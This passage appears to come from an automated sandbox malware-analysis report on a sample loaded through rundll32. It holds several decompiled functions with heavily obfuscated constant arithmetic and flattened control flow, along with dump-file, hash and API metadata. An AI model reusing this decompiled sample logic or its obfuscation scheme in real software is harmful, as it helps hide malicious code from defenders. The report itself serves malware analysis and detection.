                                                                                                                          				_v48 = _v48 ^ 0x00028c5d;
                                                                                                                          				_v12 = 0x456efe;
                                                                                                                          				_v12 = _v12 + 0xffff4082;
                                                                                                                          				_v12 = _v12 >> 1;
                                                                                                                          				_v12 = _v12 ^ 0xdbb5e427;
                                                                                                                          				_v12 = _v12 ^ 0xdb99f5c8;
                                                                                                                          				while(1) {
                                                                                                                          					_t133 =  *_t163;
                                                                                                                          					if(_t133 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					if(_t133 == 0x2e) {
                                                                                                                          						 *_t144 = 0;
                                                                                                                          					} else {
                                                                                                                          						 *_t144 = _t133;
                                                                                                                          						_t144 = _t144 + 1;
                                                                                                                          						_t163 = _t163 + 1;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					L6:
                                                                                                                          					_t164 = E0079ADE6(_v40, _v16,  &_v320, _v60);
                                                                                                                          					if(_t164 != 0) {
                                                                                                                          						L8:
                                                                                                                          						_t136 = E007ADBEA(_t163 + 1, _v8, _v28, _v44);
                                                                                                                          						_push(_v12);
                                                                                                                          						_push(_t136 ^ 0x2ac2611c);
                                                                                                                          						_push(_v48);
                                                                                                                          						_push(_t164);
                                                                                                                          						return E0079CDCD(_v56, _v20);
                                                                                                                          					}
                                                                                                                          					_t139 = E007ACADF(_v32,  &_v320, _v36, _v52);
                                                                                                                          					_t164 = _t139;
                                                                                                                          					if(_t164 != 0) {
                                                                                                                          						goto L8;
                                                                                                                          					}
                                                                                                                          					return _t139;
                                                                                                                          				}
                                                                                                                          				goto L6;
                                                                                                                          			}

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Gb$L-R$ThFT$iR6$H^
                                                                                                                          • API String ID: 0-1567385930
                                                                                                                          • Opcode ID: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                          • Instruction ID: c85078083f4810a1dd7f19811c86754eccd34787968a000f474ff3d5e2ea7994
                                                                                                                          • Opcode Fuzzy Hash: 530a903c014da879c72b207405b5d78bc36da64ddf1a64a5b02b4b5b0fc68630
                                                                                                                          • Instruction Fuzzy Hash: 07514271C05219EBDF08CFA4E94A8EEFBB1FF49314F208159D412BA260C3B91A05CF94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                          • GetKeyState.USER32(00000010), ref: 1001B463
                                                                                                                          • GetKeyState.USER32(00000011), ref: 1001B46C
                                                                                                                          • GetKeyState.USER32(00000012), ref: 1001B475
                                                                                                                          • SendMessageA.USER32 ref: 1001B48B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1063413437-0
                                                                                                                          • Opcode ID: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                          • Instruction ID: b089c7fc05c7e6fbdd4fc06f52c570ea12a8721339fdd196cb0bdf3cbec2e35a
                                                                                                                          • Opcode Fuzzy Hash: cbe92a3c8afafbb230f3664375f9361b4519f62e794af51cea28ccd5527820e8
                                                                                                                          • Instruction Fuzzy Hash: F6F0E97679075A27EB20BA744CC1F9A0154DF89BD9F028534B741EE0D3DBB0C8819170
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 76%
                                                                                                                          			E007A20BA() {
                                                                                                                          				char _v520;
                                                                                                                          				signed int _v524;
                                                                                                                          				unsigned int _v528;
                                                                                                                          				signed int _v532;
                                                                                                                          				signed int _v536;
                                                                                                                          				signed int _v540;
                                                                                                                          				signed int _v544;
                                                                                                                          				signed int _v548;
                                                                                                                          				signed int _v552;
                                                                                                                          				signed int _v556;
                                                                                                                          				signed int _v560;
                                                                                                                          				signed int _v564;
                                                                                                                          				signed int _v568;
                                                                                                                          				signed int _v572;
                                                                                                                          				signed int _v576;
                                                                                                                          				signed int _v580;
                                                                                                                          				signed int _v584;
                                                                                                                          				signed int _v588;
                                                                                                                          				signed int _v592;
                                                                                                                          				signed int _v596;
                                                                                                                          				signed int _v600;
                                                                                                                          				signed int _v604;
                                                                                                                          				signed int _v608;
                                                                                                                          				signed int _v612;
                                                                                                                          				signed int _v616;
                                                                                                                          				signed int _v620;
                                                                                                                          				signed int _v624;
                                                                                                                          				signed int _t227;
                                                                                                                          				intOrPtr _t228;
                                                                                                                          				signed int _t230;
                                                                                                                          				void* _t231;
                                                                                                                          				intOrPtr _t235;
                                                                                                                          				intOrPtr _t245;
                                                                                                                          				void* _t247;
                                                                                                                          				intOrPtr _t254;
                                                                                                                          				signed int _t272;
                                                                                                                          				signed int _t273;
                                                                                                                          				signed int _t274;
                                                                                                                          				signed int _t275;
                                                                                                                          				void* _t277;
                                                                                                                          				signed int* _t279;
                                                                                                                          				void* _t283;
                                                                                                                          
                                                                                                                          				_t279 =  &_v624;
                                                                                                                          				_v612 = 0x15bebb;
                                                                                                                          				_v612 = _v612 ^ 0x0c09d82a;
                                                                                                                          				_t247 = 0x7e01d7;
                                                                                                                          				_v612 = _v612 + 0xffff69e9;
                                                                                                                          				_v612 = _v612 ^ 0xcffb1e8d;
                                                                                                                          				_v612 = _v612 ^ 0xc3e0ceeb;
                                                                                                                          				_v596 = 0xb5bc7f;
                                                                                                                          				_v596 = _v596 << 0xa;
                                                                                                                          				_v596 = _v596 + 0xbaa7;
                                                                                                                          				_v596 = _v596 ^ 0xd6f2b68e;
                                                                                                                          				_v600 = 0x5909af;
                                                                                                                          				_v600 = _v600 ^ 0x0096463d;
                                                                                                                          				_v600 = _v600 >> 3;
                                                                                                                          				_v600 = _v600 ^ 0x0016e9cd;
                                                                                                                          				_v548 = 0x801d18;
                                                                                                                          				_v548 = _v548 + 0xffffc800;
                                                                                                                          				_v548 = _v548 ^ 0x0070ca5a;
                                                                                                                          				_v580 = 0x2361dd;
                                                                                                                          				_v580 = _v580 * 0x6f;
                                                                                                                          				_t277 = 0;
                                                                                                                          				_v580 = _v580 << 0xe;
                                                                                                                          				_v580 = _v580 ^ 0xdbb34e1e;
                                                                                                                          				_v528 = 0x864281;
                                                                                                                          				_v528 = _v528 >> 0xc;
                                                                                                                          				_v528 = _v528 ^ 0x0000b217;
                                                                                                                          				_v560 = 0x478502;
                                                                                                                          				_v560 = _v560 | 0x3d47d1eb;
                                                                                                                          				_v560 = _v560 ^ 0x3d4c1a49;
                                                                                                                          				_v540 = 0x8f961f;
                                                                                                                          				_v540 = _v540 >> 0xc;
                                                                                                                          				_v540 = _v540 ^ 0x000d133d;
                                                                                                                          				_v572 = 0xef4b2;
                                                                                                                          				_v572 = _v572 << 0xd;
                                                                                                                          				_v572 = _v572 + 0xffff85b1;
                                                                                                                          				_v572 = _v572 ^ 0xde949f86;
                                                                                                                          				_v608 = 0x8e969a;
                                                                                                                          				_v608 = _v608 << 0xd;
                                                                                                                          				_t272 = 0x21;
                                                                                                                          				_v608 = _v608 / _t272;
                                                                                                                          				_t273 = 0x2f;
                                                                                                                          				_v608 = _v608 / _t273;
                                                                                                                          				_v608 = _v608 ^ 0x002a10b8;
                                                                                                                          				_v620 = 0x864bbd;
                                                                                                                          				_v620 = _v620 << 0x10;
                                                                                                                          				_v620 = _v620 + 0x87ba;
                                                                                                                          				_v620 = _v620 + 0x936f;
                                                                                                                          				_v620 = _v620 ^ 0x4bb78bcc;
                                                                                                                          				_v564 = 0xfb8a17;
                                                                                                                          				_t274 = 0x62;
                                                                                                                          				_v564 = _v564 * 0x63;
                                                                                                                          				_v564 = _v564 ^ 0x61429d97;
                                                                                                                          				_v576 = 0x222f;
                                                                                                                          				_v576 = _v576 >> 4;
                                                                                                                          				_v576 = _v576 ^ 0xf39884cf;
                                                                                                                          				_v576 = _v576 ^ 0xf39d4647;
                                                                                                                          				_v556 = 0x6068cb;
                                                                                                                          				_v556 = _v556 ^ 0xfe1a734d;
                                                                                                                          				_v556 = _v556 ^ 0xfe79d9b4;
                                                                                                                          				_v616 = 0xc46e23;
                                                                                                                          				_v616 = _v616 >> 2;
                                                                                                                          				_v616 = _v616 / _t274;
                                                                                                                          				_v616 = _v616 * 0x76;
                                                                                                                          				_v616 = _v616 ^ 0x003e2a5a;
                                                                                                                          				_v624 = 0x4617e4;
                                                                                                                          				_v624 = _v624 + 0xffff4d74;
                                                                                                                          				_v624 = _v624 ^ 0x9dcdfd87;
                                                                                                                          				_v624 = _v624 + 0x3fd8;
                                                                                                                          				_v624 = _v624 ^ 0x9d89a5c2;
                                                                                                                          				_v588 = 0x3a0167;
                                                                                                                          				_v588 = _v588 << 1;
                                                                                                                          				_v588 = _v588 + 0xffff1a51;
                                                                                                                          				_v588 = _v588 ^ 0x00728a40;
                                                                                                                          				_v532 = 0x3a363e;
                                                                                                                          				_v532 = _v532 ^ 0xe52a74a2;
                                                                                                                          				_v532 = _v532 ^ 0xe514694b;
                                                                                                                          				_v544 = 0x52d5cb;
                                                                                                                          				_v544 = _v544 | 0x185d0a08;
                                                                                                                          				_v544 = _v544 ^ 0x18524fe5;
                                                                                                                          				_v584 = 0x37b3aa;
                                                                                                                          				_v584 = _v584 + 0xebef;
                                                                                                                          				_t275 = 0x72;
                                                                                                                          				_v584 = _v584 * 0x28;
                                                                                                                          				_v584 = _v584 ^ 0x08d0b087;
                                                                                                                          				_v592 = 0xa4bebe;
                                                                                                                          				_v592 = _v592 >> 8;
                                                                                                                          				_v592 = _v592 | 0x739fbd45;
                                                                                                                          				_v592 = _v592 ^ 0x739593e3;
                                                                                                                          				_v552 = 0x17b1c;
                                                                                                                          				_v552 = _v552 << 0xe;
                                                                                                                          				_v552 = _v552 ^ 0x5ecd7403;
                                                                                                                          				_v568 = 0x403d75;
                                                                                                                          				_v568 = _v568 >> 3;
                                                                                                                          				_v568 = _v568 | 0x80b15bc0;
                                                                                                                          				_v568 = _v568 ^ 0x80b9a416;
                                                                                                                          				_v536 = 0x2ed64e;
                                                                                                                          				_t276 = _v524;
                                                                                                                          				_v536 = _v536 / _t275;
                                                                                                                          				_v536 = _v536 ^ 0x00033d67;
                                                                                                                          				_v604 = 0x8b403d;
                                                                                                                          				_v604 = _v604 + 0xffff3866;
                                                                                                                          				_v604 = _v604 << 8;
                                                                                                                          				_v604 = _v604 ^ 0x8a7a6cd3;
                                                                                                                          				goto L1;
                                                                                                                          				do {
                                                                                                                          					while(1) {
                                                                                                                          						L1:
                                                                                                                          						_t283 = _t247 - 0x73dad95;
                                                                                                                          						if(_t283 > 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						if(_t283 == 0) {
                                                                                                                          							E007ADA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
                                                                                                                          							_t235 = E00792051(_v536,  &_v520, _v604);
                                                                                                                          							_t254 =  *0x7b3e10; // 0x0
                                                                                                                          							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
                                                                                                                          						} else {
                                                                                                                          							if(_t247 == 0x7e01d7) {
                                                                                                                          								_push(_t247);
                                                                                                                          								_push(_t247);
                                                                                                                          								 *0x7b3e10 = E00797FF2(0x45c);
                                                                                                                          								_t247 = 0x8643fcd;
                                                                                                                          								continue;
                                                                                                                          							} else {
                                                                                                                          								if(_t247 == 0xd34913) {
                                                                                                                          									_t247 = 0x148c4fa;
                                                                                                                          									_v524 = _v596;
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									if(_t247 == 0xfeb697) {
                                                                                                                          										_v524 = _v612;
                                                                                                                          										goto L8;
                                                                                                                          									} else {
                                                                                                                          										if(_t247 != 0x148c4fa) {
                                                                                                                          											goto L20;
                                                                                                                          										} else {
                                                                                                                          											E007A8F9E(_v620, _v564, _v576, _v556, _t276);
                                                                                                                          											_t279 =  &(_t279[3]);
                                                                                                                          											L8:
                                                                                                                          											_t247 = 0xac90332;
                                                                                                                          											continue;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						L23:
                                                                                                                          						return _t277;
                                                                                                                          					}
                                                                                                                          					__eflags = _t247 - 0x8643fcd;
                                                                                                                          					if(_t247 == 0x8643fcd) {
                                                                                                                          						_t227 = E0079912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
                                                                                                                          						_t276 = _t227;
                                                                                                                          						_t279 =  &(_t279[5]);
                                                                                                                          						__eflags = _t227;
                                                                                                                          						if(__eflags == 0) {
                                                                                                                          							_t247 = 0xfeb697;
                                                                                                                          							goto L20;
                                                                                                                          						} else {
                                                                                                                          							_t245 =  *0x7b3e10; // 0x0
                                                                                                                          							 *((intOrPtr*)(_t245 + 0x450)) = 1;
                                                                                                                          							_t247 = 0xd34913;
                                                                                                                          							goto L1;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						__eflags = _t247 - 0xac90332;
                                                                                                                          						if(_t247 == 0xac90332) {
                                                                                                                          							_push(_v532);
                                                                                                                          							_push(_v524);
                                                                                                                          							_push(_v588);
                                                                                                                          							_t228 =  *0x7b3e10; // 0x0
                                                                                                                          							_push(_t228 + 0x23c);
                                                                                                                          							_t230 = E007A46BB(_v616, _v624);
                                                                                                                          							_t279 = _t279 - 0xc + 0x1c;
                                                                                                                          							_t247 = 0xe2d9513;
                                                                                                                          							__eflags = _t230;
                                                                                                                          							_t231 = 1;
                                                                                                                          							_t277 =  ==  ? _t231 : _t277;
                                                                                                                          							goto L1;
                                                                                                                          						} else {
                                                                                                                          							__eflags = _t247 - 0xe2d9513;
                                                                                                                          							if(_t247 != 0xe2d9513) {
                                                                                                                          								goto L20;
                                                                                                                          							} else {
                                                                                                                          								E0079A55F();
                                                                                                                          								_t247 = 0x73dad95;
                                                                                                                          								goto L1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L23;
                                                                                                                          					L20:
                                                                                                                          					__eflags = _t247 - 0x13a2d4a;
                                                                                                                          				} while (__eflags != 0);
                                                                                                                          				goto L23;
                                                                                                                          			}













































                                                                                                                          0x007a24d8
                                                                                                                          0x007a24d8
                                                                                                                          0x007a24e0
                                                                                                                          0x007a24e6
                                                                                                                          0x00000000
                                                                                                                          0x007a24e6
                                                                                                                          0x007a245c
                                                                                                                          0x007a245c
                                                                                                                          0x007a245e
                                                                                                                          0x007a2478
                                                                                                                          0x007a247c
                                                                                                                          0x007a2480
                                                                                                                          0x007a2484
                                                                                                                          0x007a2499
                                                                                                                          0x007a249a
                                                                                                                          0x007a249f
                                                                                                                          0x007a24a2
                                                                                                                          0x007a24a7
                                                                                                                          0x007a24ab
                                                                                                                          0x007a24ac
                                                                                                                          0x00000000
                                                                                                                          0x007a2460
                                                                                                                          0x007a2460
                                                                                                                          0x007a2466
                                                                                                                          0x00000000
                                                                                                                          0x007a246c
                                                                                                                          0x007a246c
                                                                                                                          0x007a2471
                                                                                                                          0x00000000
                                                                                                                          0x007a2471
                                                                                                                          0x007a2466
                                                                                                                          0x007a245e
                                                                                                                          0x00000000
                                                                                                                          0x007a24f5
                                                                                                                          0x007a24f5
                                                                                                                          0x007a24f5
                                                                                                                          0x00000000

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: /"$>6:$Z*>$u=@
                                                                                                                          • API String ID: 0-89199335
                                                                                                                          • Opcode ID: 23410f440b74fbbc98db1310c3a234183f2d58e846f3022e529807108fdb6030
                                                                                                                          • Instruction ID: 478e42aaeddd4451b1167ce6cb467f104364339123f4a0b67e9e24287866daea
                                                                                                                          • Opcode Fuzzy Hash: 23410f440b74fbbc98db1310c3a234183f2d58e846f3022e529807108fdb6030
                                                                                                                          • Instruction Fuzzy Hash: BBB103711083809FC758CF69C48A81FBBE1FBD5748F109A1DF69286261D3B9C949CF42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 94%
                                                                                                                          			E00795548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                          				char _v16;
                                                                                                                          				intOrPtr _v24;
                                                                                                                          				char _v28;
                                                                                                                          				char _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				intOrPtr _v48;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				char _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				char _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				unsigned int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				signed int _v144;
                                                                                                                          				signed int _v148;
                                                                                                                          				void* __ecx;
                                                                                                                          				void* _t190;
                                                                                                                          				void* _t206;
                                                                                                                          				void* _t208;
                                                                                                                          				signed int _t209;
                                                                                                                          				char* _t211;
                                                                                                                          				signed int _t212;
                                                                                                                          				intOrPtr _t222;
                                                                                                                          				intOrPtr* _t225;
                                                                                                                          				void* _t227;
                                                                                                                          				char* _t229;
                                                                                                                          				char _t233;
                                                                                                                          				intOrPtr _t255;
                                                                                                                          				intOrPtr* _t257;
                                                                                                                          				signed int _t258;
                                                                                                                          				signed int _t259;
                                                                                                                          				signed int _t260;
                                                                                                                          				signed int* _t263;
                                                                                                                          
                                                                                                                          				_t225 = _a16;
                                                                                                                          				_t257 = _a4;
                                                                                                                          				_push(_t225);
                                                                                                                          				_push(_a12);
                                                                                                                          				_push(_a8);
                                                                                                                          				_push(_t257);
                                                                                                                          				_push(__edx);
                                                                                                                          				E007A20B9(_t190);
                                                                                                                          				_v56 = 0xb9e7cb;
                                                                                                                          				_t255 = 0;
                                                                                                                          				_v52 = 0x6e87b5;
                                                                                                                          				_t263 =  &(( &_v148)[6]);
                                                                                                                          				_v48 = 0;
                                                                                                                          				_v44 = 0;
                                                                                                                          				_t227 = 0x3ccc1e9;
                                                                                                                          				_v128 = 0x85629b;
                                                                                                                          				_t258 = 0x62;
                                                                                                                          				_v128 = _v128 * 0x5a;
                                                                                                                          				_v128 = _v128 + 0xfbaf;
                                                                                                                          				_v128 = _v128 ^ 0x2ee5a62d;
                                                                                                                          				_v144 = 0xfc0c7f;
                                                                                                                          				_v144 = _v144 ^ 0xfdfaf442;
                                                                                                                          				_v144 = _v144 >> 1;
                                                                                                                          				_v144 = _v144 | 0x14143ad1;
                                                                                                                          				_v144 = _v144 ^ 0x7e977ecf;
                                                                                                                          				_v96 = 0xd1f565;
                                                                                                                          				_v96 = _v96 * 0x21;
                                                                                                                          				_v96 = _v96 ^ 0x1b12de47;
                                                                                                                          				_v104 = 0xb219e8;
                                                                                                                          				_v104 = _v104 | 0x75a31cc8;
                                                                                                                          				_v104 = _v104 ^ 0x75be6df4;
                                                                                                                          				_v80 = 0x6fb9b6;
                                                                                                                          				_v80 = _v80 * 0x3e;
                                                                                                                          				_v80 = _v80 ^ 0x1b001c4a;
                                                                                                                          				_v132 = 0x1154a0;
                                                                                                                          				_v132 = _v132 << 0xb;
                                                                                                                          				_v132 = _v132 + 0xfffffde8;
                                                                                                                          				_v132 = _v132 | 0xd1d436bb;
                                                                                                                          				_v132 = _v132 ^ 0xdbfeae5a;
                                                                                                                          				_v76 = 0x5374cd;
                                                                                                                          				_v76 = _v76 << 2;
                                                                                                                          				_v76 = _v76 ^ 0x0147cb67;
                                                                                                                          				_v140 = 0x35e68a;
                                                                                                                          				_v140 = _v140 + 0xffff467d;
                                                                                                                          				_v140 = _v140 * 0x7c;
                                                                                                                          				_v140 = _v140 ^ 0x566bba39;
                                                                                                                          				_v140 = _v140 ^ 0x4faa8078;
                                                                                                                          				_v124 = 0xf91357;
                                                                                                                          				_v124 = _v124 << 0xf;
                                                                                                                          				_v124 = _v124 + 0xf2e4;
                                                                                                                          				_v124 = _v124 ^ 0x89afe8a4;
                                                                                                                          				_v112 = 0xf055e4;
                                                                                                                          				_v112 = _v112 ^ 0x101963ca;
                                                                                                                          				_v112 = _v112 | 0x7be8ad21;
                                                                                                                          				_v112 = _v112 ^ 0x7be17431;
                                                                                                                          				_v84 = 0x17393b;
                                                                                                                          				_v84 = _v84 << 6;
                                                                                                                          				_v84 = _v84 ^ 0x05c81c43;
                                                                                                                          				_v120 = 0xf688ab;
                                                                                                                          				_v120 = _v120 / _t258;
                                                                                                                          				_v120 = _v120 * 0x2d;
                                                                                                                          				_v120 = _v120 ^ 0x00718a36;
                                                                                                                          				_v116 = 0xa21f51;
                                                                                                                          				_v116 = _v116 + 0x3c3b;
                                                                                                                          				_v116 = _v116 >> 0xa;
                                                                                                                          				_v116 = _v116 ^ 0x0006c391;
                                                                                                                          				_v88 = 0x51e239;
                                                                                                                          				_v88 = _v88 + 0x2ec0;
                                                                                                                          				_v88 = _v88 ^ 0x0058dd2b;
                                                                                                                          				_v136 = 0xa92d92;
                                                                                                                          				_v136 = _v136 >> 0xd;
                                                                                                                          				_v136 = _v136 ^ 0x0647b396;
                                                                                                                          				_v136 = _v136 ^ 0x20b7ff2f;
                                                                                                                          				_v136 = _v136 ^ 0x26fd7475;
                                                                                                                          				_v108 = 0xb50576;
                                                                                                                          				_t259 = 0x45;
                                                                                                                          				_v108 = _v108 / _t259;
                                                                                                                          				_v108 = _v108 ^ 0xb94dc178;
                                                                                                                          				_v108 = _v108 ^ 0xb943792d;
                                                                                                                          				_v148 = 0xb9b260;
                                                                                                                          				_t260 = 0x14;
                                                                                                                          				_v148 = _v148 / _t260;
                                                                                                                          				_v148 = _v148 * 0x3f;
                                                                                                                          				_v148 = _v148 >> 2;
                                                                                                                          				_v148 = _v148 ^ 0x009e914b;
                                                                                                                          				_v92 = 0x6e7d65;
                                                                                                                          				_v92 = _v92 | 0xb573042f;
                                                                                                                          				_v92 = _v92 ^ 0xb570b7bc;
                                                                                                                          				_v100 = 0xfd8f7e;
                                                                                                                          				_v100 = _v100 * 0x5d;
                                                                                                                          				_v100 = _v100 ^ 0x5c1db3f3;
                                                                                                                          				L1:
                                                                                                                          				while(_t227 != 0x3c16ad4) {
                                                                                                                          					if(_t227 == 0x3ccc1e9) {
                                                                                                                          						_t227 = 0x7dbf5b4;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t227 == 0x79abc1a) {
                                                                                                                          						_t229 =  &_v28;
                                                                                                                          						_t208 = E0079AEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
                                                                                                                          						_t263 =  &(_t263[4]);
                                                                                                                          						if(_t208 != 0) {
                                                                                                                          							_push(_t229);
                                                                                                                          							_push(_t229);
                                                                                                                          							_t222 = E00797FF2(_v24);
                                                                                                                          							 *_t257 = _t222;
                                                                                                                          							if(_t222 != 0) {
                                                                                                                          								E0079ED7E(_v108,  *_t257, _v148, _v28, _v24);
                                                                                                                          								_t263 =  &(_t263[3]);
                                                                                                                          								 *((intOrPtr*)(_t257 + 4)) = _v24;
                                                                                                                          								_t255 = 1;
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          						_t227 = 0xdaef9d5;
                                                                                                                          						continue;
                                                                                                                          					}
                                                                                                                          					if(_t227 == 0x7dbf5b4) {
                                                                                                                          						_t209 =  *((intOrPtr*)(_t225 + 4));
                                                                                                                          						_t233 =  *_t225;
                                                                                                                          						_v68 = _t209;
                                                                                                                          						_v72 = _t233;
                                                                                                                          						_t211 = _t209 - 1 + _t233;
                                                                                                                          						while(_t211 > _t233) {
                                                                                                                          							if( *_t211 == 0) {
                                                                                                                          								break;
                                                                                                                          							}
                                                                                                                          							_t211 = _t211 - 1;
                                                                                                                          						}
                                                                                                                          						_t212 = _t211 - _t233;
                                                                                                                          						_v68 = _t212;
                                                                                                                          						if(_t212 == 0) {
                                                                                                                          							L16:
                                                                                                                          							_t227 = 0xfc35b14;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						while(_v68 % _v144 != _v128) {
                                                                                                                          							_t163 =  &_v68;
                                                                                                                          							 *_t163 = _v68 - 1;
                                                                                                                          							if( *_t163 != 0) {
                                                                                                                          								continue;
                                                                                                                          							}
                                                                                                                          							goto L16;
                                                                                                                          						}
                                                                                                                          						goto L16;
                                                                                                                          					}
                                                                                                                          					if(_t227 == 0xdaef9d5) {
                                                                                                                          						E007A8519(_v92, _v100, _v64);
                                                                                                                          						L28:
                                                                                                                          						return _t255;
                                                                                                                          					}
                                                                                                                          					if(_t227 != 0xfc35b14) {
                                                                                                                          						L25:
                                                                                                                          						if(_t227 != 0xb843ed5) {
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						goto L28;
                                                                                                                          					}
                                                                                                                          					if(E00795E60( &_v72, _v96, _v104,  &_v64) == 0) {
                                                                                                                          						goto L28;
                                                                                                                          					}
                                                                                                                          					_t227 = 0x3c16ad4;
                                                                                                                          				}
                                                                                                                          				_t206 = E00798B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
                                                                                                                          				_t263 =  &(_t263[4]);
                                                                                                                          				if(_t206 == 0) {
                                                                                                                          					_t227 = 0xdaef9d5;
                                                                                                                          					goto L25;
                                                                                                                          				}
                                                                                                                          				_t227 = 0x79abc1a;
                                                                                                                          				goto L1;
                                                                                                                          			}
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 1t{$9Q$;<$e}n
                                                                                                                          • API String ID: 0-2095593254
                                                                                                                          • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                          • Instruction ID: 155e7357fb066fc01c917a688597c0c139f0ccd93ad6d44d9f1f6354519eb740
                                                                                                                          • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                          • Instruction Fuzzy Hash: 87B151B1108341CFCB28CF25E58591BBBE1FBC4748F10891DF69686220D7B59A4ACF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E007A7DD5() {
                                                                                                                          				char _v520;
                                                                                                                          				char _v1040;
                                                                                                                          				signed int _v1044;
                                                                                                                          				signed int _v1048;
                                                                                                                          				intOrPtr _v1052;
                                                                                                                          				intOrPtr _v1056;
                                                                                                                          				unsigned int _v1060;
                                                                                                                          				signed int _v1064;
                                                                                                                          				signed int _v1068;
                                                                                                                          				signed int _v1072;
                                                                                                                          				signed int _v1076;
                                                                                                                          				signed int _v1080;
                                                                                                                          				signed int _v1084;
                                                                                                                          				signed int _v1088;
                                                                                                                          				signed int _v1092;
                                                                                                                          				signed int _v1096;
                                                                                                                          				signed int _v1100;
                                                                                                                          				signed int _v1104;
                                                                                                                          				signed int _v1108;
                                                                                                                          				signed int _v1112;
